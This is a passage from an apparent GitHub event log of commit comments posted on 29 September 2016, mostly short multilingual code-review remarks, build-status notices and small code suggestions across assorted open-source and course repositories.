(\\node_modules\\@angular\\compiler\\bundles\\compiler.umd.js:14405:21)\r\nCompilation failed"}},"created_at":"2016-09-29T06:12:14Z"}
{"id":"4635248891","type":"CommitCommentEvent","actor":{"login":"GawainLynch"},"repo":{"name":"bolt/bolt"},"payload":{"comment":{"id":19219357,"position":8,"line":34,"path":"src/Provider/MenuServiceProvider.php","commit_id":"aec68543a6d52ed0db717610cccb9d1f4b3cd0c6","created_at":"2016-09-29T06:12:30Z","updated_at":"2016-09-29T06:12:30Z","body":"> Probably should be refactored somehow.\r\n\r\nEars open … and shouldn't be too hard or long for one of us, but did you notice *what* was building it early?"}},"created_at":"2016-09-29T06:12:30Z"}
{"id":"4635251324","type":"CommitCommentEvent","actor":{"login":"guxiaobai"},"repo":{"name":"zgt0109/TongXin"},"payload":{"comment":{"id":19219360,"position":null,"line":null,"path":null,"commit_id":"b8002849a0f11176b830293472da1acddd5dc951","created_at":"2016-09-29T06:13:20Z","updated_at":"2016-09-29T06:13:20Z","body":"@dwz1011  注意单词拼写，随机数计算"}},"created_at":"2016-09-29T06:13:20Z"}
{"id":"4635252453","type":"CommitCommentEvent","actor":{"login":"Igorbek"},"repo":{"name":"yuriyoleynikov/NewNodeProgram"},"payload":{"comment":{"id":19219362,"position":16,"line":16,"path":"NodeProg/Infrastructure/CommentNode.cs","commit_id":"5e5f1c0a0e2ea831ee9f8560311d44aa9139a507","created_at":"2016-09-29T06:13:45Z","updated_at":"2016-09-29T06:13:45Z","body":"You can just call it `TryParseNode`"}},"created_at":"2016-09-29T06:13:45Z"}
{"id":"4635253269","type":"CommitCommentEvent","actor":{"login":"ifdog"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19219366,"position":null,"line":null,"path":null,"commit_id":"e710914af611aa42ba5454c22a71ff8b7bfdda02","created_at":"2016-09-29T06:14:02Z","updated_at":"2016-09-29T06:14:02Z","body":"丝般顺滑,说明你有个好显卡。"}},"created_at":"2016-09-29T06:14:02Z"}
{"id":"4635255851","type":"CommitCommentEvent","actor":{"login":"twangithub"},"repo":{"name":"twangithub/TwanLib"},"payload":{"comment":{"id":19219371,"position":null,"line":null,"path":null,"commit_id":"945bdb7ff44a297235f06512f6a68f00352e15dc","created_at":"2016-09-29T06:14:55Z","updated_at":"2016-09-29T06:14:55Z","body":"> 胜多负少# 是否## ### **_上帝发誓_**"}},"created_at":"2016-09-29T06:14:55Z"}
{"id":"4635256613","type":"CommitCommentEvent","actor":{"login":"twangithub"},"repo":{"name":"twangithub/TwanLib"},"payload":{"comment":{"id":19219374,"position":null,"line":null,"path":null,"commit_id":"945bdb7ff44a297235f06512f6a68f00352e15dc","created_at":"2016-09-29T06:15:13Z","updated_at":"2016-09-29T06:15:13Z","body":"[www.baidu.com](url)"}},"created_at":"2016-09-29T06:15:13Z"}
{"id":"4635261092","type":"CommitCommentEvent","actor":{"login":"kisoo-han"},"repo":{"name":"kisoo-han/cubrid-testcases"},"payload":{"comment":{"id":19219385,"position":null,"line":null,"path":null,"commit_id":"8bf139fa8dfcb37be0df206217c2f43ec2ad0896","created_at":"2016-09-29T06:16:41Z","updated_at":"2016-09-29T06:16:41Z","body":"Test Case for [CBRD-20523] Foreign Key Referential Constraints check on INSERT.\r\nApply of this test case to the current CUBRID will lead to verdict 'fail', because it\r\nhas different principal to handle foreign key referential constraints on INSERT."}},"created_at":"2016-09-29T06:16:41Z"}
{"id":"4635269092","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"dikys/C-courses"},"payload":{"comment":{"id":19219401,"position":82,"line":82,"path":"Task 1/Geometry.Test/TriangleTest.cs","commit_id":"209a22bb3423f483b78648f531b154ffbc5d6c3e","created_at":"2016-09-29T06:19:26Z","updated_at":"2016-09-29T06:19:26Z","body":"Чего-то опять сложное выражение"}},"created_at":"2016-09-29T06:19:26Z"}
{"id":"4635269659","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"dikys/C-courses"},"payload":{"comment":{"id":19219403,"position":111,"line":111,"path":"Task 1/Geometry.Test/TriangleTest.cs","commit_id":"209a22bb3423f483b78648f531b154ffbc5d6c3e","created_at":"2016-09-29T06:19:37Z","updated_at":"2016-09-29T06:19:37Z","body":"И опять сложнаааа"}},"created_at":"2016-09-29T06:19:37Z"}
{"id":"4635270764","type":"CommitCommentEvent","actor":{"login":"sigveka"},"repo":{"name":"sigveka/MoDeNa"},"payload":{"comment":{"id":19219404,"position":null,"line":null,"path":null,"commit_id":"38904cd8f748155ad1f39f2c7002252c3dcb370d","created_at":"2016-09-29T06:19:59Z","updated_at":"2016-09-29T06:19:59Z","body":"The change to initModels1 should make initModels2 redundant (i am only\nrunning more initialisation strategies). As Pavel said in an earlier\nconversation; initModels2 was originally made to isolate the initialisation\nof theology because it was causing problems. Amongst other things the\ninitModels2 script makes some \"manual\" changes to the database that are\nunnecessary, i.e. it is changing global bounds of some surrogate functions.\nHowever, those surrogate functions already have specified those bounds by\ndefault.\n\nSigve\n\nOn 27 September 2016 at 13:14, Matthias <notifications@github.com> wrote:\n\n> I assume the changes for initModels1 would require an update for\n> initModels2 as well?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/sigveka/MoDeNa/commit/38904cd8f748155ad1f39f2c7002252c3dcb370d#commitcomment-19188698>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIkTUuE47UTj0izWZxFjlrAoNwiUZHD4ks5quPqmgaJpZM4KHiwQ>\n> .\n>\n"}},"created_at":"2016-09-29T06:19:59Z"}
{"id":"4635272415","type":"CommitCommentEvent","actor":{"login":"kito2"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19219406,"position":null,"line":null,"path":null,"commit_id":"57aacb1b7d525965d5aa14bc0639b32c36aab8ed","created_at":"2016-09-29T06:20:31Z","updated_at":"2016-09-29T06:20:31Z","body":"![image](https://cloud.githubusercontent.com/assets/21250744/18943077/9c06b366-85f3-11e6-9f71-a6f85c3c1b83.png)\r\n![image](https://cloud.githubusercontent.com/assets/21250744/18943082/a264bd66-85f3-11e6-8c2b-9e0bd8a5abab.png)\r\n\r\nMaybe this could help on the bug.\r\n"}},"created_at":"2016-09-29T06:20:31Z"}
{"id":"4635274851","type":"CommitCommentEvent","actor":{"login":"andela-cdaniel"},"repo":{"name":"andela-tpeters/peictt"},"payload":{"comment":{"id":19219411,"position":10,"line":26,"path":"lib/peictt/builder/router.rb","commit_id":"9ad42df0e58df11d21bd337ffaaa714974b61a82","created_at":"2016-09-29T06:21:21Z","updated_at":"2016-09-29T06:21:21Z","body":"You could use `#find` here if you are interested in reducing the lines of code.\r\n\r\n```ruby\r\n@routes.find { |r| r.url == route.url }\r\n```\r\n\r\nIt will either return the matching route if found (which will be treated as truthy in conditionals) or nil (which will be treated as falsy in conditionals)"}},"created_at":"2016-09-29T06:21:21Z"}
{"id":"4635279714","type":"CommitCommentEvent","actor":{"login":"andela-cdaniel"},"repo":{"name":"andela-tpeters/peictt"},"payload":{"comment":{"id":19219420,"position":59,"line":90,"path":"lib/peictt/builder/template.rb","commit_id":"9ad42df0e58df11d21bd337ffaaa714974b61a82","created_at":"2016-09-29T06:22:55Z","updated_at":"2016-09-29T06:22:55Z","body":"Empty method body"}},"created_at":"2016-09-29T06:22:55Z"}
{"id":"4635290454","type":"CommitCommentEvent","actor":{"login":"GawainLynch"},"repo":{"name":"bolt/bolt"},"payload":{"comment":{"id":19219438,"position":10,"line":10,"path":"src/Configuration/PathsProxy.php","commit_id":"2e915413b2607d539da8f0985ec5dcea260a9bca","created_at":"2016-09-29T06:26:20Z","updated_at":"2016-09-29T06:26:20Z","body":"Hehe … Technically 3.3, but I only care enough about that text, to give you a hard time about something :stuck_out_tongue_winking_eye: "}},"created_at":"2016-09-29T06:26:20Z"}
{"id":"4635293537","type":"CommitCommentEvent","actor":{"login":"char101"},"repo":{"name":"NiklasGollenstede/unload-tabs"},"payload":{"comment":{"id":19219447,"position":54,"line":133,"path":"main.js","commit_id":"97f3b45ebfac8f4258778dafa4c8afa23142f3b2","created_at":"2016-09-29T06:27:22Z","updated_at":"2016-09-29T06:27:22Z","body":"I think this should be `gBrowser.selectedTab = findClosestNonPending(gBrowser.visibleTabs, tab)`"}},"created_at":"2016-09-29T06:27:22Z"}
{"id":"4635297636","type":"CommitCommentEvent","actor":{"login":"GawainLynch"},"repo":{"name":"bolt/bolt"},"payload":{"comment":{"id":19219460,"position":null,"line":null,"path":null,"commit_id":"2e915413b2607d539da8f0985ec5dcea260a9bca","created_at":"2016-09-29T06:28:40Z","updated_at":"2016-09-29T06:28:40Z","body":"I know we still have to hook in the deprecations handler into the new exception handling, but it is worth starting to add `@trigger_error()` calls?"}},"created_at":"2016-09-29T06:28:40Z"}
{"id":"4635299567","type":"CommitCommentEvent","actor":{"login":"MonkeyKingPlus"},"repo":{"name":"MonkeyKingPlus/react-native-image-view"},"payload":{"comment":{"id":19219468,"position":null,"line":null,"path":null,"commit_id":"97378a679158c4b1b23a0979a49480c6f156b3a2","created_at":"2016-09-29T06:29:20Z","updated_at":"2016-09-29T06:29:20Z","body":"ImageView support :\r\n1.Support click method;\r\n2.When load image will appear progress activity;\r\n3.Support style and props children.\r\n4.Support default image before load image done.\r\n5.perfect click  effect on android "}},"created_at":"2016-09-29T06:29:20Z"}
{"id":"4635300310","type":"CommitCommentEvent","actor":{"login":"yangdonghui"},"repo":{"name":"yangdonghui/TestSql"},"payload":{"comment":{"id":19219472,"position":null,"line":null,"path":null,"commit_id":"4e032c0d95d4e0711fdca483b16ebb0b80d8fd42","created_at":"2016-09-29T06:29:35Z","updated_at":"2016-09-29T06:29:35Z","body":"this is a test project!"}},"created_at":"2016-09-29T06:29:35Z"}
{"id":"4635303470","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":19219478,"position":null,"line":null,"path":null,"commit_id":"ff4b2cd3986a7564d77711c329fcbb72b9024951","created_at":"2016-09-29T06:30:33Z","updated_at":"2016-09-29T06:30:33Z","body":"Do you want me to bring this into the main codebase?"}},"created_at":"2016-09-29T06:30:33Z"}
{"id":"4635304559","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"juliendubrail/julien_spices"},"payload":{"comment":{"id":19219479,"position":13,"line":13,"path":"wk5/http_request_listener/index.js","commit_id":"b31930563b29ce9cf5d4259abba9929a84a85c48","created_at":"2016-09-29T06:30:52Z","updated_at":"2016-09-29T06:30:52Z","body":"Is this to get rid of query strings?"}},"created_at":"2016-09-29T06:30:52Z"}
{"id":"4635305280","type":"CommitCommentEvent","actor":{"login":"CherryChu"},"repo":{"name":"CherryChu/pupil"},"payload":{"comment":{"id":19219484,"position":null,"line":null,"path":null,"commit_id":"56f15c719c3e6d7c6b0dc25f9207f1e9d2b47c1f","created_at":"2016-09-29T06:31:05Z","updated_at":"2016-09-29T06:31:05Z","body":"import pandas as pd\r\nfrom pandas import DataFrame\r\n\r\nprint 'Please enter the location of pupil_postions:'\r\naddress=raw_input()\r\n\r\ndf=pd.read_csv(address)\r\n\r\ndf1=df.sort(['timestamp'],ascending=[1])\r\ndf2=df1.to_csv('t.csv',index=None)"}},"created_at":"2016-09-29T06:31:05Z"}
{"id":"4635306778","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":19219489,"position":6,"line":3712,"path":"interface/forms/eye_mag/view.php","commit_id":"c5a8f129c4002df9d53d18d0e196500a6c7083d5","created_at":"2016-09-29T06:31:34Z","updated_at":"2016-09-29T06:31:34Z","body":"Should be(remove the ../ ):\r\n``````\r\n<script type=\"text/javascript\" src=\"<?php echo $GLOBALS['assets_static_relative'] ?>/manual-added-packages/shortcut.js-2-01-B/shortcut.js\"></script>"}},"created_at":"2016-09-29T06:31:34Z"}
{"id":"4635307830","type":"CommitCommentEvent","actor":{"login":"dare0021"},"repo":{"name":"dare0021/KerasBasedSpeechClassifier"},"payload":{"comment":{"id":19219492,"position":null,"line":null,"path":null,"commit_id":"7877114469a1dd2d0a2a7efc9208a78f639e0644","created_at":"2016-09-29T06:31:54Z","updated_at":"2016-09-29T06:31:54Z","body":"Also added model saving"}},"created_at":"2016-09-29T06:31:54Z"}
{"id":"4635308125","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"MenkinaNataliya/CourseOfTheContour"},"payload":{"comment":{"id":19219493,"position":21,"line":21,"path":"Triangle1/Program.cs","commit_id":"d2eba1e54654bbfe97fa740a2a0205629555e5d4","created_at":"2016-09-29T06:31:59Z","updated_at":"2016-09-29T06:31:59Z","body":"нет, только не goto"}},"created_at":"2016-09-29T06:31:59Z"}
{"id":"4635308582","type":"CommitCommentEvent","actor":{"login":"GawainLynch"},"repo":{"name":"bolt/bolt"},"payload":{"comment":{"id":19219496,"position":22,"line":22,"path":"src/Twig/Handler/RoutingHandler.php","commit_id":"7ea60c06c802aad4723e67a8018cd8eb3c0c0855","created_at":"2016-09-29T06:32:08Z","updated_at":"2016-09-29T06:32:08Z","body":"That must've hurt :wink: "}},"created_at":"2016-09-29T06:32:08Z"}
{"id":"4635308666","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"juliendubrail/julien_spices"},"payload":{"comment":{"id":19219497,"position":27,"line":27,"path":"wk5/http_request_listener/index.js","commit_id":"b31930563b29ce9cf5d4259abba9929a84a85c48","created_at":"2016-09-29T06:32:10Z","updated_at":"2016-09-29T06:32:10Z","body":":)"}},"created_at":"2016-09-29T06:32:10Z"}
{"id":"4635309288","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":19219499,"position":null,"line":null,"path":null,"commit_id":"c5a8f129c4002df9d53d18d0e196500a6c7083d5","created_at":"2016-09-29T06:32:23Z","updated_at":"2016-09-29T06:32:23Z","body":"Do you want me to bring this into the main codebase?\r\n(I can make the above minor fix)"}},"created_at":"2016-09-29T06:32:23Z"}
{"id":"4635315339","type":"CommitCommentEvent","actor":{"login":"zosrothko"},"repo":{"name":"bracketttc/poco"},"payload":{"comment":{"id":19219508,"position":null,"line":null,"path":null,"commit_id":"df8e0929083621ad4ed8359e3690efa38a300a27","created_at":"2016-09-29T06:34:13Z","updated_at":"2016-09-29T06:34:13Z","body":"Your changes breaks the current build system using GNU Make and all packaging related scripts lile debian & fedora.  Foundation/include/Poco/Config.h should stay as it is without having using CMake for its generation."}},"created_at":"2016-09-29T06:34:13Z"}
{"id":"4635315916","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"AlejandroMagual/spicedacademy"},"payload":{"comment":{"id":19219509,"position":17,"line":17,"path":"wk5/http-request/part1.js","commit_id":"d5afed2db8e0a6fbab2d992bce767f6e37f9ced9","created_at":"2016-09-29T06:34:23Z","updated_at":"2016-09-29T06:34:23Z","body":"It's not necessary to put parens around each condition. I.e.,\r\n\r\n```js\r\nif (method === 'GET' || method === 'HEAD') {\r\n```\r\n\r\nwould work fine"}},"created_at":"2016-09-29T06:34:23Z"}
{"id":"4635315957","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"MenkinaNataliya/CourseOfTheContour"},"payload":{"comment":{"id":19219510,"position":12,"line":12,"path":"Triangle1/Program.cs","commit_id":"d2eba1e54654bbfe97fa740a2a0205629555e5d4","created_at":"2016-09-29T06:34:24Z","updated_at":"2016-09-29T06:34:24Z","body":"паблик означает, что кто угодно может поменять значение вашего поля из вне, вы делаете проверки в конструкторе и всё зря, потому что потом без проверки я посавлю стороне отрицательное значение и всё"}},"created_at":"2016-09-29T06:34:24Z"}
{"id":"4635316427","type":"CommitCommentEvent","actor":{"login":"acidsound"},"repo":{"name":"gbox3d/unityTutorial"},"payload":{"comment":{"id":19219511,"position":185,"line":40,"path":"ui_sample/Assets/exam10_uirx_drag/exam10_uirx_drag.cs","commit_id":"d4e53055228128c5dfc80c3fb4656c8f0d603ca5","created_at":"2016-09-29T06:34:33Z","updated_at":"2016-09-29T06:34:33Z","body":"40,41은 없어도 되겠네요."}},"created_at":"2016-09-29T06:34:33Z"}
{"id":"4635317980","type":"CommitCommentEvent","actor":{"login":"foerg"},"repo":{"name":"mbsim-env/mbsim"},"payload":{"comment":{"id":19219515,"position":null,"line":null,"path":null,"commit_id":"657aba9851d6bac898344e8a0db2f5b90478cb84","created_at":"2016-09-29T06:35:01Z","updated_at":"2016-09-29T06:35:01Z","body":"Fixed mechanics/flexible_body/flexible_crank_mechanism_fe and mechanics/flexible_body/sliding_mass_ffr to avoid timeout. The example xml/flexible_crank_mechanism_fe should not be checked and reported, actually, as it is already done for mechanics/flexible_body/flexible_crank_mechanism_fe. This also applies for some other examples. So we should think about a new folder (e.g. examples/gui) where we store examples that are not used for validation but only for demonstration. Is there already a possibility in the runexamples script to exclude folders from being reported?"}},"created_at":"2016-09-29T06:35:01Z"}
{"id":"4635320131","type":"CommitCommentEvent","actor":{"login":"alerque"},"repo":{"name":"teusbenschop/bibledit"},"payload":{"comment":{"id":19219520,"position":null,"line":null,"path":null,"commit_id":"45f35222d062c6b7702b71bd194c2ba46e3c072a","created_at":"2016-09-29T06:35:39Z","updated_at":"2016-09-29T06:35:39Z","body":"It looks like this was only working because the browser was buggy and accepting malformed content. My guess is that got fixed upstream revealing the problem here which would never have manifested itself before."}},"created_at":"2016-09-29T06:35:39Z"}
{"id":"4635321486","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19219522,"position":null,"line":null,"path":null,"commit_id":"57b67ad10d728ba030d3ca6147f7f3b2da3a3eb3","created_at":"2016-09-29T06:36:02Z","updated_at":"2016-09-29T06:36:02Z","body":"I like how with your AST most of these scary sounding problems come down to fixing a type in one place!"}},"created_at":"2016-09-29T06:36:02Z"}
{"id":"4635321903","type":"CommitCommentEvent","actor":{"login":"NedScott"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":19219523,"position":186,"line":357,"path":"system/keymaps/keyboard.xml","commit_id":"9719da3ea8046d363f3ebf650368ce7ef0838ed3","created_at":"2016-09-29T06:36:09Z","updated_at":"2016-09-29T06:36:09Z","body":"https://github.com/xbmc/xbmc/pull/10584"}},"created_at":"2016-09-29T06:36:09Z"}
{"id":"4635322081","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19219524,"position":null,"line":null,"path":null,"commit_id":"833794140c562a010327741c01f0aefeb09b3da8","created_at":"2016-09-29T06:36:12Z","updated_at":"2016-09-29T06:36:12Z","body":"develop (evanweaver) - i386-Windows-7-VisualStudio-12: OK (2409 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-833794140c562a010327741c01f0aefeb09b3da8-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-833794140c562a010327741c01f0aefeb09b3da8-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.41%25-yellow.svg)</a> \n"}},"created_at":"2016-09-29T06:36:12Z"}
{"id":"4635328371","type":"CommitCommentEvent","actor":{"login":"GawainLynch"},"repo":{"name":"bolt/bolt"},"payload":{"comment":{"id":19219529,"position":90,"line":90,"path":"src/Canonical.php","commit_id":"03050344326626578c4ed9cca12f265ffcd5d9ac","created_at":"2016-09-29T06:38:11Z","updated_at":"2016-09-29T06:38:11Z","body":"Shouldn't we see if HTTPS enforcement is enabled and vary the scheme base on that?"}},"created_at":"2016-09-29T06:38:11Z"}
{"id":"4635328520","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"MenkinaNataliya/CourseOfTheContour"},"payload":{"comment":{"id":19219530,"position":73,"line":73,"path":"Triangle1/Program.cs","commit_id":"d2eba1e54654bbfe97fa740a2a0205629555e5d4","created_at":"2016-09-29T06:38:13Z","updated_at":"2016-09-29T06:38:13Z","body":"Плохое название метода, не понятно что он вернет, когда я его вызову.\r\nПока получается, что вернет какого-то Герона"}},"created_at":"2016-09-29T06:38:13Z"}
{"id":"4635328597","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"KarenNemeth/Spiced-Academy"},"payload":{"comment":{"id":19219531,"position":26,"line":62,"path":"wk5/http-request-listener.js","commit_id":"5dc115f28c9a114681c0e926fc4b494dfd985088","created_at":"2016-09-29T06:38:15Z","updated_at":"2016-09-29T06:38:15Z","body":"brackets please!"}},"created_at":"2016-09-29T06:38:15Z"}
{"id":"4635331341","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"MenkinaNataliya/CourseOfTheContour"},"payload":{"comment":{"id":19219537,"position":79,"line":79,"path":"Triangle1/Program.cs","commit_id":"d2eba1e54654bbfe97fa740a2a0205629555e5d4","created_at":"2016-09-29T06:39:04Z","updated_at":"2016-09-29T06:39:04Z","body":"Тоже самое про имя\r\nКроме того, должен ли быть этот метод public?"}},"created_at":"2016-09-29T06:39:04Z"}
{"id":"4635331695","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"MenkinaNataliya/CourseOfTheContour"},"payload":{"comment":{"id":19219538,"position":83,"line":83,"path":"Triangle1/Program.cs","commit_id":"d2eba1e54654bbfe97fa740a2a0205629555e5d4","created_at":"2016-09-29T06:39:11Z","updated_at":"2016-09-29T06:39:11Z","body":"И тут"}},"created_at":"2016-09-29T06:39:11Z"}
{"id":"4635331999","type":"CommitCommentEvent","actor":{"login":"sveisvei"},"repo":{"name":"finn-no/unleash"},"payload":{"comment":{"id":19219539,"position":null,"line":null,"path":null,"commit_id":"f2c3142906c053a398f18522ad256fe48effcc4a","created_at":"2016-09-29T06:39:17Z","updated_at":"2016-09-29T06:39:17Z","body":":)"}},"created_at":"2016-09-29T06:39:17Z"}
{"id":"4635332919","type":"CommitCommentEvent","actor":{"login":"c-schmitz"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19219541,"position":null,"line":null,"path":null,"commit_id":"1e5f80c0dc73eb3fcff156f2d1458f21ec00c377","created_at":"2016-09-29T06:39:35Z","updated_at":"2016-09-29T06:39:35Z","body":"Please discuss it in person - thank you. "}},"created_at":"2016-09-29T06:39:35Z"}
{"id":"4635333064","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19219542,"position":null,"line":null,"path":null,"commit_id":"e710914af611aa42ba5454c22a71ff8b7bfdda02","created_at":"2016-09-29T06:39:38Z","updated_at":"2016-09-29T06:39:38Z","body":";; This buffer is for notes you don't want to save, and for Lisp evaluation.\r\n;; If you want to create a file, visit that file with C-x C-f,\r\n;; then enter the text in that file's own buffer.\r\n\r\n我的是GTX 950，垃圾显卡\r\n\r\n另外Add Remove之类到操作建议仿照我在Game类里写的那个，一个add的buffer，一个remove的buffer。\r\n\r\nNOI Linux垃圾输入法 垃圾Friefox浏览器 GitHub网页都加载不完，发评论我都不敢在浏览器里面输入，这些文字都是在Emacs里打的。 T T\r\n\r\n话说维护Frice会不会耽误你的各种出差啊w"}},"created_at":"2016-09-29T06:39:38Z"}
{"id":"4635333412","type":"CommitCommentEvent","actor":{"login":"stephanemagnenat"},"repo":{"name":"aseba-community/dashel"},"payload":{"comment":{"id":19219545,"position":13,"line":583,"path":"dashel/dashel-posix.cpp","commit_id":"474435c132694c5ca4d546d8e28fd79220e83106","created_at":"2016-09-29T06:39:45Z","updated_at":"2016-09-29T06:39:45Z","body":"Do you mean you suggest to disconnect the so major number from the use-readable library number? If we bump the minor revision number, we should not break ABI, should we?"}},"created_at":"2016-09-29T06:39:45Z"}
{"id":"4635335987","type":"CommitCommentEvent","actor":{"login":"BrandonHe"},"repo":{"name":"smartdevice475/sdl_core"},"payload":{"comment":{"id":19219548,"position":5,"line":488,"path":"src/components/protocol_handler/src/protocol_handler_impl.cc","commit_id":"dd55baaba6b31d71dac9135638424475e69a0b67","created_at":"2016-09-29T06:40:31Z","updated_at":"2016-09-29T06:40:31Z","body":"I can't understand why you uncomment this line code, add AutoLock is necessary here I think."}},"created_at":"2016-09-29T06:40:31Z"}
{"id":"4635337087","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"jaels/node.js"},"payload":{"comment":{"id":19219550,"position":14,"line":14,"path":"http.js","commit_id":"8111aec616ab9fdd4d2a3b13dc4bb230a6da4dce","created_at":"2016-09-29T06:40:53Z","updated_at":"2016-09-29T06:40:53Z","body":"This will stop working right in 7984 years"}},"created_at":"2016-09-29T06:40:53Z"}
{"id":"4635340315","type":"CommitCommentEvent","actor":{"login":"roblav96"},"repo":{"name":"NativeScript/android-runtime"},"payload":{"comment":{"id":19219552,"position":null,"line":null,"path":null,"commit_id":"3d762825b02bf8555bb9b1c36d0bd574bc187238","created_at":"2016-09-29T06:41:54Z","updated_at":"2016-09-29T06:41:54Z","body":"@Plamen5kov Does this mean the `android-dts-generator` will produce better declarations?"}},"created_at":"2016-09-29T06:41:54Z"}
{"id":"4635342407","type":"CommitCommentEvent","actor":{"login":"fotis83"},"repo":{"name":"fotis83/CodeBootcamp"},"payload":{"comment":{"id":19219554,"position":null,"line":null,"path":null,"commit_id":"82b9de0969264df08c3a805b68590322f179d7d2","created_at":"2016-09-29T06:42:30Z","updated_at":"2016-09-29T06:42:30Z","body":"proud of this one"}},"created_at":"2016-09-29T06:42:30Z"}
{"id":"4635342606","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"HaxeFoundation/HaxeManual"},"payload":{"comment":{"id":19219555,"position":null,"line":null,"path":null,"commit_id":"b51241607e2eaa0cf878598b75215fae8eca7866","created_at":"2016-09-29T06:42:35Z","updated_at":"2016-09-29T06:42:35Z","body":"Nice! Suddenly .tex looks a lot less scary."}},"created_at":"2016-09-29T06:42:35Z"}
{"id":"4635343988","type":"CommitCommentEvent","actor":{"login":"almhrahman"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":19219558,"position":null,"line":null,"path":null,"commit_id":"acb8c0a0a27255e3f0af85ab2f687e0e9b82b6db","created_at":"2016-09-29T06:43:00Z","updated_at":"2016-09-29T06:43:00Z","body":"The model item passed into the dictionary is of type 'System.Collections.Generic.List`1[ShoppingCart.Models.Movie]', but this dictionary requires a model item of type 'ShoppingCart.ViewModels.RandomMovieViewModel'.\r\n\r\nI've facing the issue once all 3 first exercises are completed in local. please help me to get rid out this issue."}},"created_at":"2016-09-29T06:43:00Z"}
{"id":"4635344532","type":"CommitCommentEvent","actor":{"login":"liangchunsheng"},"repo":{"name":"liangchunsheng/react_project"},"payload":{"comment":{"id":19219559,"position":null,"line":null,"path":null,"commit_id":"4ce97db8483a3feb7f1e85dab15d393dc552ba22","created_at":"2016-09-29T06:43:10Z","updated_at":"2016-09-29T06:43:10Z","body":"236"}},"created_at":"2016-09-29T06:43:10Z"}
{"id":"4635346842","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"MenkinaNataliya/CourseOfTheContour"},"payload":{"comment":{"id":19219564,"position":25,"line":25,"path":"Triangle1/Program.cs","commit_id":"d2eba1e54654bbfe97fa740a2a0205629555e5d4","created_at":"2016-09-29T06:43:53Z","updated_at":"2016-09-29T06:43:53Z","body":"Очень сложный конструктор, вынесите каждый блок с присвоением полей в отдельный метод\r\nВаши комментарии подсказывают вам, что этот блок надо вынести в метод и как этот метод назвать :)\r\nКонструктор станет проще и вы легко поймете как избавиться от goto"}},"created_at":"2016-09-29T06:43:53Z"}
{"id":"4635347336","type":"CommitCommentEvent","actor":{"login":"Plamen5kov"},"repo":{"name":"NativeScript/android-runtime"},"payload":{"comment":{"id":19219567,"position":null,"line":null,"path":null,"commit_id":"3d762825b02bf8555bb9b1c36d0bd574bc187238","created_at":"2016-09-29T06:44:02Z","updated_at":"2016-09-29T06:44:02Z","body":"@roblav96, this commit is related to the dex (dalvik executable) files that we generate and, unfortunately, is not related to the d.ts files."}},"created_at":"2016-09-29T06:44:02Z"}
{"id":"4635351179","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"MenkinaNataliya/CourseOfTheContour"},"payload":{"comment":{"id":19219578,"position":66,"line":66,"path":"TestTriangle/UnitTest1.cs","commit_id":"d2eba1e54654bbfe97fa740a2a0205629555e5d4","created_at":"2016-09-29T06:45:09Z","updated_at":"2016-09-29T06:45:09Z","body":"По имени метода не понятно, что проверяет тест, попробуйте придумать говорящее название"}},"created_at":"2016-09-29T06:45:09Z"}
{"id":"4635351367","type":"CommitCommentEvent","actor":{"login":"BrandonHe"},"repo":{"name":"smartdevice475/sdl_core"},"payload":{"comment":{"id":19219579,"position":7,"line":262,"path":"src/components/protocol_handler/test/protocol_payload_test.cc","commit_id":"dd55baaba6b31d71dac9135638424475e69a0b67","created_at":"2016-09-29T06:45:12Z","updated_at":"2016-09-29T06:45:12Z","body":"Please notice this TEST function with parameter `ExtractProtocolWithJSONWithDataWithWrongPayloadSize`, if you add `prot_payload_test.data.size()`, it leads `CorrectPayloadSize`"}},"created_at":"2016-09-29T06:45:12Z"}
